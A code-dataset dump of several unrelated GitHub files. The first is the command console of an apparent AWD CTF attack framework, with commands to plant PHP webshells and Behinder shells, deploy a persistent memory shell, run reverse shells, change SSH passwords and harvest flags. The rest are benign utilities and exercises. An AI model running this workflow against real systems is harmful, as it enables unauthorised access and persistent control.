autopassh 循环修改ssh密码\r\n sshcmd 批量执行预设的ssh命令\r\n recvcmd 反弹shell(recv)命令执行\r\n autorecvflag 通过recvshell自动拿flag并提交\r\n getflag 根据webreq获取一次flag\r\n showflag 查看已获取的flag\r\n submitflag 提交一次数据库中的flag\r\n autoreqflag webreq自动获取flag并提交\r\n setshell 设置一句话木马(php)\r\n showshell 查看存储的一句话木马\r\n getmell 获取不死马,执行反弹shell命令(php)\r\n setbehind 设置冰蝎木马(php)\r\n cmdbehind 利用冰蝎批量执行命令\r\n showbehind 查看存储的冰蝎木马\r\n rmsoftLink 删除现有的软链接\r\n exit 退出\r\n \"\"\"\r\n printRed(string)\r\n printGreen(self.commandHelp)\r\n\r\n def help_addip(self):\r\n printGreen(\"例如输��:addip 10.10.11-22.10 80-90\")\r\n printGreen(\"addip [ip段] [端口段]\")\r\n def help_showip(self):\r\n printGreen(\"查看已录入的ip\")\r\n def help_removeip(self):\r\n printGreen(\"例如输入:removeip 127.0.0.1-10 10-20\")\r\n printGreen(\"remove [ip段] [端口段]\")\r\n def help_setshell(self):\r\n printGreen(\"\"\"[demo]:setshell 39.105.92.157 8801-8810 assets/scripts/pass.php 123456 post\"\"\")\r\n def help_setbehind(self):\r\n printGreen(\"\"\"[demo]:setbehind 39.105.92.157 8801-8810 assets/scripts/shell.php 123456\"\"\")\r\n def help_addssh(self):\r\n printGreen(\"例如输入:addssh 10.10.11-22.10 80-90\")\r\n printGreen(\"addssh [ip段] [端口段]\")\r\n def help_removessh(self):\r\n printGreen(\"例如输入:removessh 127.0.0.1 22\")\r\n printGreen(\"remove [ip] [端口]\")\r\n def do_addssh(self,argv):\r\n init_ssh()\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_addssh()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n if save_ssh(ip_l, port_l):\r\n printGreen(\"[+]SSH信息录入成功\")\r\n else:\r\n printRed(\"[-]SSH信息录入失败\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1010\")\r\n def do_showssh(self,argv):\r\n count = 0\r\n result = select_ssh()\r\n printYellow(\"*****SSH-LIST*****\")\r\n printYellow(\"*****************\")\r\n for row in result:\r\n printGreen(row[0])\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]您暂未设置SSH信息\")\r\n printYellow(\"*****************\")\r\n\r\n def do_addip(self,argv):\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_addip()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n save_address(ip_l,port_l)\r\n # sql=\"\"\"insert into ipList (ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]ip地址录入成功\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1001\")\r\n def do_removeip(self,argv):\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_removeip()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n remove_address(ip_l,port_l)\r\n # sql=\"\"\"insert into ipList (ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]ip地址删除成功\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1002\")\r\n\r\n def do_removessh(self,argv):\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n 
printYellow(\"==============================\")\r\n self.help_removessh()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n remove_ssh(ip_l, port_l)\r\n # sql=\"\"\"insert into ipList (ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]SSH地址删除成功\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1012\")\r\n\r\n def do_showip(self,argv):\r\n count = 0\r\n result = select_ip()\r\n printYellow(\"*****IP-LIST*****\")\r\n printYellow(\"*****************\")\r\n for row in result:\r\n printGreen(row[0])\r\n count=1\r\n if count == 0:\r\n printRed(\"[-]您暂未设置ip\")\r\n printYellow(\"*****************\")\r\n\r\n def do_exit(self, argv):\r\n printGreen(\"See You Next Time!!!!\")\r\n return True\r\n\r\n def Error(self, info):\r\n print(info)\r\n return\r\n\r\n def do_init(self,argv):\r\n try:\r\n yml_init()\r\n printGreen(\"[+]初始化成功\")\r\n except:\r\n printRed(\"[-]初始化失败\")\r\n\r\n def do_getflag(self,argv):\r\n try:\r\n init_flag()\r\n f = open('flag.txt', 'w+', encoding='utf8')\r\n f.write(\"\")\r\n f.close()\r\n attack = Attack()\r\n attack.attack(func=payload)\r\n time.sleep(5)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1003\")\r\n\r\n def do_showflag(self,argv):\r\n count = 0\r\n result = select_flag()\r\n printYellow(\"*************************FLAG-LIST*****************************\")\r\n printYellow(\"***************************************************************\")\r\n for row in result:\r\n printGreen(f\"{row[0]}->{row[1]}\")\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]暂无flag\")\r\n printYellow(\"***************************************************************\")\r\n def do_submitflag(self,argv):\r\n try:\r\n attack=Attack()\r\n attack.trans_flag(func=reqFlagServer)\r\n time.sleep(5)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1004\")\r\n\r\n def do_autoreqflag(self,argv):\r\n try:\r\n while(1):\r\n auto_reqgetflag()\r\n progress_test(3)\r\n auto_submitflag()\r\n progress_test()\r\n\r\n except:\r\n print('[-]执行过程遇到错误,错误代码:1005')\r\n\r\n def do_autorecvflag(self,argv):\r\n try:\r\n while (1):\r\n auto_recvgetflag()\r\n progress_test(3)\r\n auto_submitflag()\r\n progress_test()\r\n # while(1):\r\n except:\r\n pass\r\n def do_autopassh(self,argv):\r\n try:\r\n while(1):\r\n printGreen(\"=============================\")\r\n attack = Attack(\"ssh\")\r\n attack.ack_ssh(func=passh)\r\n time.sleep(1)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1017\")\r\n def do_autosolkflag(self,argv):\r\n try:\r\n while(1):\r\n init_flag()\r\n f = open('flag.txt', 'w+', encoding='utf8')\r\n f.write(\"\")\r\n f.close()\r\n attack = Attack(\"softlink\")\r\n attack.ack_softLink(func=auto_solkflag)\r\n time.sleep(2)\r\n progress_test(3)\r\n auto_submitflag()\r\n progress_test()\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1019\")\r\n def do_setshell(self,argv):\r\n\r\n cmds = argv.split(' ')\r\n if len(cmds) != 5:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_setshell()\r\n else:\r\n ip = cmds[0]\r\n port = cmds[1]\r\n path = cmds[2]\r\n passwd = cmds[3]\r\n method = cmds[4]\r\n try:\r\n setWebShell(ip,port,path,passwd,method)\r\n # sql=\"\"\"insert into ipList 
(ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]WebShell录入成功,可尝试使用getmell获取不死马\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1008\")\r\n def do_setbehind(self,argv):\r\n cmds = argv.split(' ')\r\n if len(cmds) != 4:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_setbehind()\r\n else:\r\n ip = cmds[0]\r\n port = cmds[1]\r\n path = cmds[2]\r\n passwd = cmds[3]\r\n try:\r\n setBehinder(ip,port,path,passwd)\r\n printGreen(\"[+]Behinder录入成功,可尝试使用cmdbehind执行命令\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1017\")\r\n def do_getmell(self,argv):\r\n try:\r\n # if SoftLink == True:\r\n # init_softLink()\r\n attack=Attack()\r\n attack.ack_memshell(func=upMemShell)\r\n printYellow(\"[++]不死马地址:http://xxx/.yml.php?pass=y7m01i 密码awd\")\r\n except:\r\n printRed(\"[-]执行���程遇到错误,错误代码:1009\")\r\n def do_showshell(self,argv):\r\n count = 0\r\n result = select_shell()\r\n printYellow(\"*************************SHELL-LIST*****************************\")\r\n printYellow(\"***************************************************************\")\r\n for row in result:\r\n printGreen(f\"{row[1]} {row[2]} {row[3]}\")\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]暂无shell\")\r\n printYellow(\"***************************************************************\")\r\n def do_showbehind(self,argv):\r\n count = 0\r\n result = select_behinder()\r\n printYellow(\"*************************Behind-List*****************************\")\r\n printYellow(\"*****************************************************************\")\r\n for row in result:\r\n printGreen(f\"{row[1]} {row[2]}\")\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]暂无Behind\")\r\n printYellow(\"*****************************************************************\")\r\n\r\n def do_passh(self,argv):\r\n try:\r\n attack = Attack(\"ssh\")\r\n attack.ack_ssh(func=passh)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1011\")\r\n def do_sshcmd(self,argv):\r\n try:\r\n attack = Attack(\"ssh\")\r\n attack.ack_ssh(func=ssh_cmd)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1012\")\r\n def do_recvcmd(self,argv):\r\n try:\r\n exec_recvcmd()\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1013\")\r\n def do_cmdbehind(self,argv):\r\n try:\r\n # if SoftLink == True:\r\n # init_softLink()\r\n attack = Attack('behinder')\r\n attack.ack_behinder(func=cmdBehinder)\r\n printGreen(\"=====================================\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1017\")\r\n def do_rmsoftLink(self,argv):\r\n try:\r\n init_softLink()\r\n printGreen(\"[+]删除成功\")\r\n except:\r\n printRed(\"[-]删除失败!\")\r\n def complete_yemoli(self, text, *ignored):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n yml = YmlConsole()\r\n # yml.cmdloop()\r\n try:\r\n os.system('clear')\r\n yml.cmdloop()\r\n except:\r\n exit()","repo_name":"yemoli/YML-AWD-FRAME-FOR-BUGKU","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":14515,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"76"} +{"seq_id":"42201843695","text":"from gl import Raytracer, color\nfrom obj import Obj, Texture, Envmap\nfrom sphere import *\nimport random\n\n\n\nbrick = Material(diffuse = color(0.8, 0.25, 0.25 ), spec = 16)\nstone = Material(diffuse = color(0.4, 0.4, 0.4 ), spec = 32)\nmirror = Material(spec = 64, matType = 1)\nglass 
= Material(spec = 64, ior = 1.5, matType= 2) \n\nboxMat = Material(texture = Texture('mwood.bmp'))\nlava = Material(texture = Texture('lava.bmp'))\nearthMat = Material(texture = Texture('energy.bmp'))\nwall =Material(texture = Texture('mbrick.bmp'))\n\n#size\nwidth = 580\nheight = 580\nr = Raytracer(width,height)\nr.glClearColor(0.2, 0.6, 0.8)\nr.glClear()\n\n#env map\nr.envmap = Envmap('animenv.bmp')\n\n#spheres\nprint(\"trabajando en esferas\")\nr.scene.append(Sphere([-1.01, 0.047, -4.552], 0.4, earthMat))\nr.scene.append(Sphere([1.01, 0.047, -4.552], 0.4, lava))\nr.scene.append(Sphere([0.01, 1.01, -5.552], 0.4, glass))\nr.scene.append(Sphere([0.01, 0.01, -3.552], 0.4, glass))\nr.scene.append(Sphere([0.01, -1.01, -3.552], 0.4, mirror))\n\n# Lights\nprint(\"trabajando en luces\")\nr.dirLight = DirectionalLight(direction = (1, -1, -2), intensity = 0.5) #directional light\nr.pointLights.append(PointLight(intensity=0.1, position=(0, 2.5, 0))) #spotlight\nr.ambientLight = AmbientLight(strength = 0.1) #ambientlight\n\n# Objects\nprint(\"trabajando en cajas\")\nr.scene.append( AABB((0.01, -1.59, -6.04), [6, 0.2, 6] , boxMat ) )\nr.scene.append( AABB((3.38, 1.01, -6.12), [0.1, 6.86, 6.86] , wall ) )\nr.scene.append( AABB((-3.38, 1.01, -6.12), [0.1, 6.86, 6.86] , wall ) )\nr.scene.append( AABB((0.35, 0.01, -6.00), [0.3, 0.3, 0.3], stone))\nr.scene.append( AABB((-0.35, 0.01, -6.00), [0.3, 0.3, 0.3], brick))\nr.scene.append( AABB([0.01, 3.6, -5.98], [6.86, 0.2, 6.86] , mirror ) )\n\n\n\nr.rtRender()\n\nr.glFinish('output.bmp')\n\n\n\n\n\n","repo_name":"Mcoconan/proyecto2G","sub_path":"RayTracer.py","file_name":"RayTracer.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3184698343","text":"import os, sys, re\nimport logging\nimport argparse\nimport time\n\n\nclass SplitAndCombineFiles:\n \"\"\" This is a simple class to split and merge the files\n\n 1. Split the binary files to the smaller chunks\n 2. merge the binary files into the single file\n usage :\n usage: file_split_merge [-h] [-i INPUT] [-s] [-n CHUNK] [-m]\n\n optional arguments:\n -h, --help show this help message and exit\n -i INPUT, --input INPUT\n Provide the File that needs to be Split\n -s, --split To Split the File\n -n CHUNK, --chunk CHUNK\n No. 
of Chunks to be created\n -m, --merge Merge the Files\n\n examples :\n file_split_merge -s -i first_project.zip -n 5\n file_split_merge -s -i first_project.zip -n 5kb\n file_split_merge -s -i first_project.zip -n 2gb\n file_split_merge -s -i \"c:\\temp\\first_project.zip\" -n 5\n file_split_merge -m -i first_project.zip\n file_split_merge -m -i \"c:\\temp\\\\first_project.zip\"\n \"\"\"\n def __init__(self):\n self.__input_file_name = None\n self.__chunk = None\n self.__postfix = '.ros'\n self.f_size = 0\n self.check_list = \"\"\n self.data_read_chunk = 5\n\n def get_file_chunks_from_count(self):\n \"\"\" This method is to get the file chunk sizes\"\"\"\n # get the file zize\n self.f_size = os.path.getsize(self.__input_file_name)\n log(\"Total file Size : {}\".format(str(self.f_size)))\n\n # get the file chunks\n f_chunk = int(float(self.f_size) / float(self.__chunk))\n log(\"Splitting into {} files of {} size\".format(str(self.__chunk),\n str(f_chunk)))\n return int(f_chunk), int(self.__chunk)\n\n def get_file_count_from_size(self):\n \"\"\" This method is to get the file chunk sizes\"\"\"\n\n size = {\"b\": 1, \"kb\": 1024, \"mb\": 1024 ** 2, \"gb\": 1024 ** 3}\n\n # get the file zize\n self.f_size = os.path.getsize(self.__input_file_name)\n log(\"Total file Size : {}\".format(str(self.f_size)))\n\n # get the file chunks\n f_chunk = re.sub(\"\\D\", \"\", self.__chunk)\n size_type = self.__chunk.replace(f_chunk, \"\")\n f_chunk = int(f_chunk) * size[size_type]\n no_of_files = self.f_size / f_chunk\n if no_of_files > 1:\n no_of_files = int(no_of_files) + 1 if \\\n no_of_files%int(no_of_files) > 0 \\\n else int(no_of_files)\n else:\n no_of_files = 1\n\n log(\"Splitting into {} files of {} size\".format(str(no_of_files),\n str(self.__chunk)))\n\n return int(f_chunk), int(no_of_files)\n\n @staticmethod\n def read_file_in_chunks(file_obj, read_until=-1, chunk_size=5):\n \"\"\"\n Lazy function to read a file piece by piece.\n Default chunk size: 5mb.\n :param file_obj : The file open object which has to be read\n :param read_until : How much of total chunk has to be read from\n the file.\n Default = -1 i.e read full file\n :param chunk_size : How much of chunk has to be read in one iter\n Default chunk size: 5mb.\n :return Data Generator\n \"\"\"\n\n tot_read = 0\n total_iter = 0\n total_count = 0\n last_chunk = False\n chunk_size = chunk_size * 1024 * 8 # convert to mb\n # If chunk_size is greater than the read_until, then\n # default the chunk_size to read_until\n if not read_until == -1 and \\\n (read_until < chunk_size):\n chunk_size = read_until\n\n # if not reading full file , count total iteration required to\n # accumulate the read_until size.\n if not read_until == -1:\n total_iter = int(read_until/chunk_size)\n\n while True:\n # If not reading full file, then calculate the remaining chunks\n # in the last iteration\n if (total_count == total_iter - 1) and not read_until == -1:\n chunk_size = read_until - tot_read\n last_chunk = True\n\n data = file_obj.read(chunk_size)\n tot_read += len(data)\n total_count += 1\n\n # if data is present , then yiled , else break\n if data:\n yield data\n else:\n break\n\n # If this is a last chunk, then break\n if last_chunk:\n # print(total_count, total_iter, chunkSize)\n break\n\n def __split(self, input_file_name, chunk_size):\n \"\"\" Split the files\n :param input_file_name : The filename which has to be split\n :param chunk_size : Actual number of files to be split\n :return None\n \"\"\"\n self.__input_file_name = input_file_name\n self.__chunk 
= chunk_size\n\n log(\"Splitting the File Now\")\n\n if self.__chunk.isdigit():\n f_chunk, chunk_size = self.get_file_chunks_from_count()\n else:\n f_chunk, chunk_size = self.get_file_count_from_size()\n\n # read the content of the main file\n read_main_file = open(self.__input_file_name, \"rb\")\n tot_bytes_in_file = 0\n\n # Iterate through chunk size\n for i in range(int(chunk_size)):\n log(\" - Splitting {}/{} files\".format(str(i+1),\n str(int(chunk_size))))\n\n _chunk_file_name = \"{}-{}{}\".format(str(self.__input_file_name),\n str(i+1),\n str(self.__postfix))\n\n # Last chunk , include the remaining data\n if i == chunk_size - 1:\n f_chunk = self.f_size - tot_bytes_in_file\n\n # Read the chunks from the file\n # data = read_main_file.read(f_chunk)\n data = self.read_file_in_chunks(read_main_file, read_until=f_chunk,\n chunk_size = self.data_read_chunk)\n\n # collect the first chunk and last chunk of every file\n # This content is used for verification while merging\n first_check = None\n last_check = None\n with open(_chunk_file_name, \"wb\") as _:\n for chunks in data:\n if not first_check:\n first_check = chunks[5]\n last_check = chunks[-5]\n _.write(chunks)\n\n tot_bytes_in_file += f_chunk\n\n # crc content\n self.check_list += str(first_check) + \"-\" + str(last_check)\n\n _crc_file_name = \"{}-{}{}\".format(str(self.__input_file_name),\n \"CRC\", str(self.__postfix))\n\n # log(\"Creating the check file : {}\".format(str(_crc_file_name)))\n with open(_crc_file_name, \"w\") as crc_file:\n crc_file.write(self.check_list)\n\n log(\"File split successfully\")\n\n def __merge(self, input_file_name):\n \"\"\" Merge the Files\n :param input_file_name : filename in .zip format ex : filename.zip\n :return none\"\"\"\n log(\"Merging the file to {}\".format(str(input_file_name)))\n\n _root_dir, _file_name = os.path.split(\n os.path.realpath(input_file_name))\n\n _file_path = os.path.join(_root_dir, _file_name)\n\n if os.path.exists(_file_path):\n log(\"File Already Exist. 
Please remove the {} and \"\n \"then re-run.\".format(str(_file_path)))\n\n # Prompt if file need to be deleted automatically\n prompt = input(\"\\nDo you want to remove the file [Y/N] : \")\n if prompt.strip().lower() == \"y\":\n os.remove(_file_path)\n else:\n return\n\n # get all the split files available\n file_list = self.get_split_files(_root_dir, _file_name)\n if not file_list:\n log(\"No Split files found\")\n return\n\n # get the crc file\n _crc_file_name = \"{}-{}{}\".format(str(_file_name),\n \"CRC\", str(self.__postfix))\n _crc_file_path = os.path.join(_root_dir,_crc_file_name)\n if not os.path.exists(_crc_file_path):\n log(\"{} file is missing\".format(str(_crc_file_path)))\n return\n\n _crc_data = open(_crc_file_path, \"r\").read()\n\n # Merge the files\n # Sort the file names\n log(\"Found {} file(s) for merging\".format(len(file_list)))\n for files in sorted(file_list):\n f_name = file_list[files]\n log(\" - Merging {} file\".format(f_name))\n # collect the first chunk and last chunk of every file\n # This content is used for verification while merging\n first_check = None\n last_check = None\n with open(input_file_name, 'ab') as new_file:\n read_main_file = open(os.path.join(_root_dir,\n f_name), 'rb')\n data = self.read_file_in_chunks(read_main_file,\n read_until=-1,\n chunk_size=\n self.data_read_chunk)\n for chunks in data:\n if not first_check:\n first_check = chunks[5]\n last_check = chunks[-5]\n new_file.write(chunks)\n\n # create the content for the file copy check\n self.check_list += str(first_check) + \"-\" + str(last_check)\n\n # check the crc data\n log(\"Checking if the files are merged properly\")\n if _crc_data == self.check_list:\n log(\"File check : Passed\")\n else:\n log(\"File check : Failed.\")\n return\n\n log(\"File Merged successfully\")\n\n def get_split_files(self, root_dir, file_name):\n \"\"\" Find out all the zip files in the folder\n :param root_dir : Directory path where files are present\n :param file_name : filename in .zip format ex : filename.zip\n :return list of the files\n \"\"\"\n # Find all the files matching the format\n file_list = {}\n\n file_format = re.compile(file_name + '-' + '[0-9]+'+self.__postfix)\n for f in os.listdir(root_dir):\n if file_format.match(f):\n _ = f.split('-')[-1]\n _ = int(re.sub('\\D', '', _))\n file_list[_] = f\n\n return file_list\n\n def split(self, input_file_name, chunk_size):\n self.__split(input_file_name, chunk_size)\n\n def merge(self, input_file_name):\n self.__merge(input_file_name)\n\n\ndef error_args(error_msg):\n \"\"\" this is just a error message for args\"\"\"\n log(\"\\n\")\n log(\"Error : Arguments provided is invalid\")\n log(error_msg)\n log(\"use -h for more details\")\n exit(usage())\n\n\ndef log(value):\n \"\"\" This is just a print method\"\"\"\n print(value)\n\n\ndef usage():\n return r\"\"\"\\n\n --------------------------------------------------------------\n Usage: file_split_merge [-h] [-i INPUT] [-s] [-n CHUNK] [-m]\\n\n optional arguments:\n -h, --help show this help message and exit\n -i INPUT, --input INPUT\n Provide the File that needs to be Split\n -s, --split To Split the File\n -n CHUNK, --chunk CHUNK\n [n]: No. 
of files to be created\n [n]kb : Split the file in nKB size\n [n]b : Split the file in nb size\n [n]mb : Split the file in nmb size\n [n]gb : Split the file in ngb size\n\n -m, --merge Merge the Files\n\n\n examples :\n file_split_merge -s -i first_project.zip -n 5\n file_split_merge -s -i first_project.zip -n 5kb\n file_split_merge -s -i first_project.zip -n 2gb\n file_split_merge -s -i \"c:\\temp\\first_project.zip\" -n 5\n file_split_merge -m -i first_project.zip\n file_split_merge -m -i \"c:\\temp\\\\first_project.zip\"\n ----------------------------------------------------------------\n \"\"\"\n\n\ndef main():\n start_time = time.time()\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input',\n help=\"Provide the File that needs to be Split\")\n parser.add_argument('-s', '--split', action=\"store_true\",\n help=\"To Split the File\")\n parser.add_argument('-n', '--chunk',\n help=\"No. of Chunks to be created\")\n parser.add_argument('-m', '--merge', action=\"store_true\",\n help=\"Merge the Files\")\n parser.add_argument('-r', '--read', default=5,type=int,\n help=\"The speed at which data has to be read. \"\n \"Higher the value , faster the process, \"\n \"but possible memory leak\")\n\n args = parser.parse_args()\n\n # Perform Split Operation\n\n if not (args.split or args.merge):\n error_args(\"-s or -m has to be Specified\")\n\n if args.split:\n log(\"\\n------------- STARTING FILE SPLIT -------------\\n\")\n if not(args.input and args.chunk):\n error_args(\"Split command requires -i and -n\")\n else:\n sm = SplitAndCombineFiles()\n sm.data_read_chunk = args.read\n sm.split(args.input, args.chunk)\n\n\n # Perform Merge Operation\n if args.merge:\n log(\"\\n------------- STARTING FILE MERGE -------------\\n\")\n if not args.input:\n error_args(\"Merge command requires -i\")\n else:\n sm = SplitAndCombineFiles()\n sm.data_read_chunk = args.read\n sm.merge(args.input)\n\n log(\"Complete in {} seconds\".format(str(int(time.time() - start_time))))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"roshanok/file_split_merge","sub_path":"file_split_merge/file_split_merge.py","file_name":"file_split_merge.py","file_ext":"py","file_size_in_byte":13977,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"72996380406","text":"from django import forms\nfrom . 
models import Booking\n\n\nclass BookingForm(forms.ModelForm):\n\n\n class Meta:\n model = Booking\n fields = [\n 'user_name',\n 'name',\n 'children',\n 'adult',\n 'check_in',\n 'check_out',\n 'email',\n 'request_guiid',\n ]\n widgets = {\n # 'check_out': forms.DateField(format(\"%b %d %Y\")),\n 'check_in': forms.DateInput(format=('%m/%d/%Y'), attrs={'class':'form-control', 'placeholder':'Select a date', 'type':'date'}),\n 'check_out': forms.DateInput(format=('%m/%d/%Y'), attrs={'class':'form-control', 'placeholder':'Select a date', 'type':'date'}),\n \n }\n \n \n\n\n \n ","repo_name":"Emmanuel-Aggrey/toursite","sub_path":"ticket/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38616248610","text":"from random import randrange\r\n\r\n\r\ndef display_board(board):\r\n\tprint(\"+-------\" * 3,\"+\", sep=\"\")\r\n\tfor row in range(3):\r\n\t\tprint(\"| \" * 3,\"|\", sep=\"\")\r\n\t\tfor col in range(3):\r\n\t\t\tprint(\"| \" + str(board[row][col]) + \" \", end=\"\")\r\n\t\tprint(\"|\")\r\n\t\tprint(\"| \" * 3,\"|\",sep=\"\")\r\n\t\tprint(\"+-------\" * 3,\"+\",sep=\"\")\r\n\r\n\r\ndef enter_move(board):\r\n\tok = False\r\n\twhile not ok:\r\n\t\tmove = input(\"Ingresa tu movimiento: \") \r\n\t\tok = len(move) == 1 and move >= '1' and move <= '9'\r\n\t\tif not ok:\r\n\t\t\tprint(\"Movimiento erróneo, ingrésalo nuevamente\")\r\n\t\t\tcontinue\r\n\t\tmove = int(move) - 1\r\n\t\trow = move // 3\r\n\t\tcol = move % 3\r\n\t\tsign = board[row][col]\r\n\t\tok = sign not in ['O','X'] \r\n\t\tif not ok:\r\n\t\t\tprint(\"¡Cuadro ocupado, ingresa nuevamente!\")\r\n\t\t\tcontinue\r\n\tboard[row][col] = 'O'\r\n\r\n\r\ndef make_list_of_free_fields(board):\r\n\tfree = []\r\n\tfor row in range(3):\r\n\t\tfor col in range(3):\r\n\t\t\tif board[row][col] not in ['O','X']:\r\n\t\t\t\tfree.append((row,col))\r\n\treturn free\r\n\r\n\r\ndef victory_for(board,sgn):\r\n\tif sgn == \"X\":\r\n\t\twho = 'me'\r\n\telif sgn == \"O\":\r\n\t\twho = 'you'\r\n\telse:\r\n\t\twho = None\r\n\tcross1 = cross2 = True\r\n\tfor rc in range(3):\r\n\t\tif board[rc][0] == sgn and board[rc][1] == sgn and board[rc][2] == sgn:\r\n\t\t\treturn who\r\n\t\tif board[0][rc] == sgn and board[1][rc] == sgn and board[2][rc] == sgn:\r\n\t\t\treturn who\r\n\t\tif board[rc][rc] != sgn:\r\n\t\t\tcross1 = False\r\n\t\tif board[2 - rc][2 - rc] != sgn:\r\n\t\t\tcross2 = False\r\n\tif cross1 or cross2:\r\n\t\treturn who\r\n\treturn None\r\n\r\n\r\ndef draw_move(board):\r\n\tfree = make_list_of_free_fields(board)\r\n\tcnt = len(free)\r\n\tif cnt > 0:\r\n\t\tthis = randrange(cnt)\r\n\t\trow, col = free[this]\r\n\t\tboard[row][col] = 'X'\r\n\r\n\r\nboard = [ [3 * j + i + 1 for i in range(3)] for j in range(3) ] \r\nboard[1][1] = 'X'\r\nfree = make_list_of_free_fields(board)\r\nhuman_turn = True\r\nwhile len(free):\r\n\tdisplay_board(board)\r\n\tif human_turn:\r\n\t\tenter_move(board)\r\n\t\tvictor = victory_for(board,'O')\r\n\telse:\t\r\n\t\tdraw_move(board)\r\n\t\tvictor = victory_for(board,'X')\r\n\tif victor != None:\r\n\t\tbreak\r\n\thuman_turn = not human_turn\t\t\r\n\tfree = make_list_of_free_fields(board)\r\n\r\ndisplay_board(board)\r\nif victor == 'you':\r\n\tprint(\"¡Has ganado!\")\r\nelif victor == 'me':\r\n\tprint(\"¡He 
ganado!\")\r\nelse:\r\n\tprint(\"¡Empate!\")\r\n","repo_name":"Zamora-000419/Tic-tac-toe-Python","sub_path":"Tic-Tac-Toe.py","file_name":"Tic-Tac-Toe.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9861084660","text":"'''\ngoal : 현서가 찬홍이에게 가는 길에 만나는 소의 여물을 주는 최소 비용 구하기\n 1) N,M의 범위가 크다 -> 플루이드 워셜 X\n 2) 최단 경로(비용) 구하기\n0. 라이브러리 추가 _ sys(입력), heapq\n1. 입력 받기\n 1) N,M : 노드와 간선의 수\n 2) FROM, TO, COST : 시작 / 도착 / 비용\n2. 로직\n 1) 변수 : graph(인접노드 추가), distance(방문여부 체크 _ INF 로 초기화)\n 2) 다익스트라 알고리즘 : HEAPQ를 활용\n3. 결과출력\n'''\n\n# 0\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\nINF = float('inf')\n\n\ndef shortestPath(s):\n q = [(0, s)]\n distance[s] = 0\n\n while q:\n cost, node = heapq.heappop(q)\n\n if distance[node] < cost:\n continue\n\n for i in graph[node]:\n cc = cost + i[1]\n if cc < distance[i[0]]:\n distance[i[0]] = cc\n heapq.heappush(q, (cc, i[0]))\n\n\n# 1\nN, M = map(int, input().split())\ngraph = [[] * (N+1) for _ in range(N+1)]\ndistance = [INF] * (N+1)\n\nfor _ in range(M):\n fr, to, cost = map(int, input().split())\n graph[fr].append((to, cost))\n graph[to].append((fr, 